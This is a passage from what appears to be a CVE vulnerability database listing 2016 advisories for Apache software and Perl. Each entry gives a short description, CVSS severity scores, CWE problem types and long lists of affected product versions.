apache struts 1.3.10
apache struts 1.2.8
apache struts 1.2.0
apache struts 1.2.1
apache struts 1.2.7
apache struts 1.2.5
apache struts 1.3.9
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
oracle banking_platform 2.5.0
apache struts 1.1
apache struts 1.3.7
oracle banking_platform 2.4.0
apache struts 1.0
CVE-2016-1182 MEDIUM

ActionServlet.java in Apache Struts 1 1.x through 1.3.10 does not properly restrict the Validator configuration, which allows remote attackers to conduct cross-site scripting (XSS) attacks or cause a denial of service via crafted input, a related issue to CVE-2015-0899.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.2.1
apache struts 1.2.7
apache struts 1.3.6
apache struts 1.3.5
apache struts 1.0.1
apache struts 1.2.5
apache struts 1.2.3
apache struts 1.3.9
apache struts 1.0.2
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
apache struts 1.2.6
apache struts 1.3.10
apache struts 1.2.8
apache struts 1.2.0
apache struts 1.1
apache struts 1.3.7
apache struts 1.0
CVE-2016-1238 HIGH

(1) cpan/Archive-Tar/bin/ptar, (2) cpan/Archive-Tar/bin/ptardiff, (3) cpan/Archive-Tar/bin/ptargrep, (4) cpan/CPAN/scripts/cpan, (5) cpan/Digest-SHA/shasum, (6) cpan/Encode/bin/enc2xs, (7) cpan/Encode/bin/encguess, (8) cpan/Encode/bin/piconv, (9) cpan/Encode/bin/ucmlint, (10) cpan/Encode/bin/unidump, (11) cpan/ExtUtils-MakeMaker/bin/instmodsh, (12) cpan/IO-Compress/bin/zipdetails, (13) cpan/JSON-PP/bin/json_pp, (14) cpan/Test-Harness/bin/prove, (15) dist/ExtUtils-ParseXS/lib/ExtUtils/xsubpp, (16) dist/Module-CoreList/corelist, (17) ext/Pod-Html/bin/pod2html, (18) utils/c2ph.PL, (19) utils/h2ph.PL, (20) utils/h2xs.PL, (21) utils/libnetcfg.PL, (22) utils/perlbug.PL, (23) utils/perldoc.PL, (24) utils/perlivp.PL, and (25) utils/splain.PL in Perl 5.x before 5.22.3-RC2 and 5.24 before 5.24.1-RC2 do not properly remove . (period) characters from the end of the includes directory array, which might allow local users to gain privileges via a Trojan horse module under the current working directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
perl perl 5.16.1
perl perl 5.21.10
perl perl 5.17.2
perl perl 5.17.1
perl perl 5.003_90
perl perl 5.8.8
perl perl 5.003_28
perl perl 5.10.1
perl perl 5.18.0
perl perl 5.19.1
perl perl 5.24.0
perl perl 5.003_05
perl perl 5.003_03
perl perl 5.13.2
perl perl 5.19.5
perl perl 5.003_11
perl perl 5.003_15
perl perl 5.003_13
perl perl 5.005
perl perl 5.003_26
perl perl 5.003_25
perl perl 5.17.9
perl perl 5.21.5
perl perl 5.8.6
perl perl 5.10
perl perl 5.004_01
perl perl 5.003_20
perl perl 5.6.1
perl perl 5.005_01
perl perl 5.003_97e
perl perl 5.003_18
perl perl 5.15.5
perl perl 5.11.2
perl perl 5.15.6
perl perl 5.19.0
perl perl 5.19.6
perl perl 5.003_97d
perl perl 5.8.4
perl perl 5.003_08
perl perl 5.18.4
perl perl 5.11.5
perl perl 5.21.6
perl perl 5.19.2
perl perl 5.19.7
perl perl 5.21.1
perl perl 5.003_12
perl perl 5.18.3
perl perl 5.003_99
perl perl 5.13.8
perl perl 5.8.0
perl perl 5.22.2
perl perl 5.9.5
perl perl 5.12.4
perl perl 5.003_98
perl perl 5.003_09
perl perl 5.17.3
perl perl 5.19.8
perl perl 5.17.5
perl perl 5.21.8
perl perl 5.15.1
perl perl 5.17.7.0
perl perl 5.8.9
perl perl 5.18.2
perl perl 5.003_99a
perl perl 5.19.11
perl perl 5.21.4
debian debian_linux 8.0
perl perl 5.001
perl perl 5.003_97
perl perl 5.005_03
perl perl 5.004
perl perl 5.13.3
perl perl 5.003_22
perl perl 5.6.0
perl perl 5.9.0
perl perl 5.15.8
perl perl 5.15.4
perl perl 1.0.15
perl perl 5.16.0
perl perl 5.13.0
perl perl 5.8.1
perl perl 5.20.3
perl perl 5.9.1
perl perl 5.003_91
perl perl 5.20.0
perl perl 5.003_04
perl perl 5.21.7
perl perl 5.8.7
perl perl 5.003_97f
perl perl 5.14.2
perl perl 5.003_97a
perl perl 5.003_97h
perl perl 5.003_14
perl perl 5.003_10
perl perl 5.22.0
perl perl 5.13.9
perl perl 5.17.7
perl perl 5.8.2
perl perl 5.003_97b
perl perl 5.10.0
perl perl 5.003_96
perl perl 5.19.9
perl perl 5.13.7
perl perl 5.004_05
perl perl 5.7.3
perl perl 5.004_03
apache spamassassin *
perl perl 5.13.10
perl perl 5.14.3
perl perl 5.17.8
perl perl 5.11.1
perl perl 5.19.3
perl perl 5.9.3
perl perl 5.24.1
perl perl 5.16.3
perl perl 5.003_23
perl perl 5.000
perl perl 1.0.16
perl perl 5.8
perl perl 5.8.3
perl perl 5.002
perl perl 5.19.10
perl perl 5.003
perl perl 5.003_24
perl perl 5.003_97g
perl perl 5.15.0
perl perl 5.12.5
perl perl 5.15.3
perl perl 5.20.1
perl perl 5.21.2
perl perl 5.9.4
perl perl 5.6
opensuse leap 15.0
perl perl 5.11.0
perl perl 5.003_95
perl perl 5.15.9
perl perl 5.9.2
perl perl 5.003_93
perl perl 5.14.1
perl perl 5.003_02
perl perl 5.22.1
perl perl 5.13.5
perl perl 5.13.6
perl perl 5.001n
perl perl 5.003_16
perl perl 5.13.11
perl perl 5.17.6
perl perl 5.003_97i
perl perl 5.20.2
perl perl 5.21.11
perl perl 5.12.2
perl perl 5.13.4
perl perl 5.005_02
perl perl 5.11.3
perl perl 5.16.2
perl perl 5.17.4
perl perl 5.11.4
perl perl 5.003_94
perl perl 5.14.0
perl perl 5.19.4
perl perl 5.21.9
perl perl 5.8.5
perl perl 5.12.0
fedoraproject fedora 23
perl perl 5.003_92
perl perl 5.003_01
perl perl 5.004_04
perl perl 5.003_21
perl perl 5.003_27
perl perl 5.17.0
perl perl 5.003_19
perl perl 5.22.3
perl perl 5.21.3
perl perl 5.005_04
fedoraproject fedora 24
perl perl 5.004_02
perl perl 5.17.11
perl perl 5.14.4
perl perl 5.15.7
perl perl 5.12.3
perl perl 5.003_97c
perl perl 5.6.2
perl perl 5.12.1
perl perl 5.13.1
perl perl 5.000o
perl perl 5.18.1
perl perl 5.003_17
perl perl 5.002_01
perl perl 5.003_07
perl perl 5.21.0
perl perl 5.003_97j
perl perl 5.17.10
perl perl 5.15.2
CVE-2016-1240 HIGH

The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 8.0
apache tomcat 7.0
apache tomcat 6.0
CVE-2016-15057

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Continuum. This issue affects Apache Continuum: all versions. Attackers with access to the installations REST API can use this to invoke arbitrary commands on the server. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

Products Affected

Vendor Product Version
apache continuum *
CVE-2016-1513 MEDIUM

The Impress tool in Apache OpenOffice 4.1.2 and earlier allows remote attackers to cause a denial of service (out-of-bounds read or write) or execute arbitrary code via crafted MetaActions in an (1) ODP or (2) OTP file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2016-1546 MEDIUM

The Apache HTTP Server 2.4.17 and 2.4.18, when mod_http2 is enabled, does not limit the number of simultaneous stream workers for a single HTTP/2 connection, which allows remote attackers to cause a denial of service (stream-processing outage) via modified flow-control windows.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.4.17
apache http_server 2.4.18
CVE-2016-1566 LOW

Cross-site scripting (XSS) vulnerability in the file browser in Guacamole 0.9.8 and 0.9.9, when file transfer is enabled to a location shared by multiple users, allows remote authenticated users to inject arbitrary web script or HTML via a crafted filename. NOTE: this vulnerability was fixed in guacamole.war on 2016-01-13, but the version number was not changed.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache guacamole 0.9.8
apache guacamole 0.9.9
CVE-2016-2099 HIGH

Use-after-free vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 3.1.3 and earlier allows context-dependent attackers to have unspecified impact via an invalid character in an XML document.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
opensuse opensuse 13.2
apache xerces-c++ *
CVE-2016-2161 MEDIUM

In Apache HTTP Server versions 2.4.0 to 2.4.23, malicious input to mod_auth_digest can cause the server to crash, and each instance continues to crash even for subsequently valid requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-823,CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server 2.4.0
apache http_server 2.4.19
apache http_server 2.4.23
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.22
apache http_server 2.4.3
apache http_server 2.4.16
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.21
apache http_server 2.4.14
CVE-2016-2162 MEDIUM

Apache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.1.2_beta
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-2163 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache OpenMeetings before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the event description when creating an event.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-2164 MEDIUM

The (1) FileService.importFileByInternalUserId and (2) FileService.importFile SOAP API methods in Apache OpenMeetings before 3.1.1 improperly use the Java URL class without checking the specified protocol handler, which allows remote attackers to read arbitrary files by attempting to upload a file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-2166 MEDIUM

The (1) proton.reactor.Connector, (2) proton.reactor.Container, and (3) proton.utils.BlockingConnection classes in Apache Qpid Proton before 0.12.1 improperly use an unencrypted connection for an amqps URI scheme when SSL support is unavailable, which might allow man-in-the-middle attackers to obtain sensitive information or modify data via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
fedoraproject fedora 23
apache qpid_proton *
CVE-2016-2167 MEDIUM

The canonicalize_username function in svnserve/cyrus_auth.c in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4, when Cyrus SASL authentication is used, allows remote attackers to authenticate and bypass intended access restrictions via a realm string that is a prefix of an expected repository realm string.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.0
apache subversion *
apache subversion 1.9.3
CVE-2016-2168 MEDIUM

The req_check_access function in the mod_authz_svn module in the httpd server in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a crafted header in a (1) MOVE or (2) COPY request, involving an authorization check.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.0
apache subversion *
apache subversion 1.9.3
CVE-2016-2170 HIGH

Apache OFBiz 12.04.x before 12.04.06 and 13.07.x before 13.07.03 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections library.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2016-2171 MEDIUM

The User Manager service in Apache Jetspeed before 2.3.1 does not properly restrict access using Jetspeed Security, which allows remote attackers to (1) add, (2) edit, or (3) delete users via the REST API.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-2174 MEDIUM

SQL injection vulnerability in the policy admin tool in Apache Ranger before 0.5.3 allows remote authenticated administrators to execute arbitrary SQL commands via the eventTime parameter to service/plugins/policies/eventTime.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.2
apache ranger 0.5.0
CVE-2016-2175 HIGH

Apache PDFBox before 1.8.12 and 2.x before 2.0.1 does not properly initialize the XML parsers, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted PDF.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache pdfbox 1.8.11
apache pdfbox 2.0
apache pdfbox 1.8.2
apache pdfbox 1.8.9
apache pdfbox 1.8.10
apache pdfbox 1.8.1
debian debian_linux 8.0
apache pdfbox 1.8.6
apache pdfbox 1.8.8
apache pdfbox 1.8.3
apache pdfbox 1.8.5
apache pdfbox 1.8.7
apache pdfbox 1.8.0
apache pdfbox 1.8.4
CVE-2016-3081 HIGH

Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
oracle siebel_e-billing 7.1
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3082 HIGH

XSLTResult in Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1 allows remote attackers to execute arbitrary code via the stylesheet location parameter.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3083 MEDIUM

Apache Hive (JDBC + HiveServer2) implements SSL for plain TCP and HTTP connections (it supports both transport modes). While validating the server's certificate during the connection setup, the client in Apache Hive before 1.2.2 and 2.0.x before 2.0.1 doesn't seem to be verifying the common name attribute of the certificate. In this way, if a JDBC client sends an SSL request to server abc.com, and the server responds with a valid certificate (certified by CA) but issued to xyz.com, the client will accept that as a valid certificate and the SSL handshake will go through.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache hive 1.1.0
apache hive 1.0.0
apache hive 1.0.1
apache hive 1.1.1
apache hive 0.13.0
apache hive 0.13.1
apache hive 0.14.0
apache hive 1.2.0
apache hive 1.2.1
CVE-2016-3085 MEDIUM

Apache CloudStack 4.5.x before 4.5.2.1, 4.6.x before 4.6.2.1, 4.7.x before 4.7.1.1, and 4.8.x before 4.8.0.1, when SAML-based authentication is enabled and used, allow remote attackers to bypass authentication and access the user interface via vectors related to the SAML plugin.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,CWE-287,

Products Affected

Vendor Product Version
apache cloudstack 4.7.0
apache cloudstack 4.6.0
apache cloudstack 4.6.2
apache cloudstack 4.8
apache cloudstack 4.5.2
apache cloudstack 4.6.1
apache cloudstack 4.5.1
CVE-2016-3086 MEDIUM

The YARN NodeManager in Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3 can leak the password for credential store provider used by the NodeManager to YARN Applications.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop 2.6.0
apache hadoop 2.6.3
apache hadoop 2.7.2
apache hadoop 2.6.1
CVE-2016-3087 HIGH

Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
CVE-2016-3088 HIGH

The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-434,

Products Affected

Vendor Product Version
apache activemq *
CVE-2016-3089 MEDIUM

Cross-site scripting (XSS) vulnerability in the SWF panel in Apache OpenMeetings before 3.1.2 allows remote attackers to inject arbitrary web script or HTML via the swf parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-3090 MEDIUM

The TextParseUtil.translateVariables method in Apache Struts 2.x before 2.3.20 allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.1.7
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.3.15.1
apache struts 2.3.13
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.6
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.3.9
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.5
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3092 HIGH

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
hp icewall_identity_manager 5.0
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 7.0.68
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 8.5.2
apache tomcat 7.0.28
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
apache tomcat 8.0.5
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
hp icewall_sso_agent_option 10.0
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 8.5.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 8.0.32
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.8
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.2
apache tomcat 8.0.28
apache commons_fileupload *
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2016-3093 MEDIUM

Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
ognl_project ognl *
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3094 MEDIUM

PlainSaslServer.java in Apache Qpid Java before 6.0.3, when the broker is configured to allow plaintext passwords, allows remote attackers to cause a denial of service (broker termination) via a crafted authentication attempt, which triggers an uncaught exception.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-287,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2016-3427 HIGH

Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,CWE-284,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
opensuse leap 42.1
suse manager 2.1
apache cassandra *
redhat enterprise_linux_server_eus 6.7
suse linux_enterprise_server 10
netapp oncommand_performance_manager -
oracle jre 1.8.0
netapp vasa_provider_for_clustered_data_ontap *
suse linux_enterprise_server 12
redhat enterprise_linux_server 6.0
redhat enterprise_linux_eus 7.2
netapp e-series_santricity_management_plug-ins -
oracle jre 1.7.0
oracle linux 6
redhat enterprise_linux_desktop 5.0
netapp oncommand_unified_manager -
opensuse opensuse 13.2
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
apache cassandra 4.0.0
debian debian_linux 8.0
canonical ubuntu_linux 16.04
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 7.0
netapp virtual_storage_console *
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
netapp oncommand_balance -
canonical ubuntu_linux 15.10
redhat enterprise_linux_eus 7.6
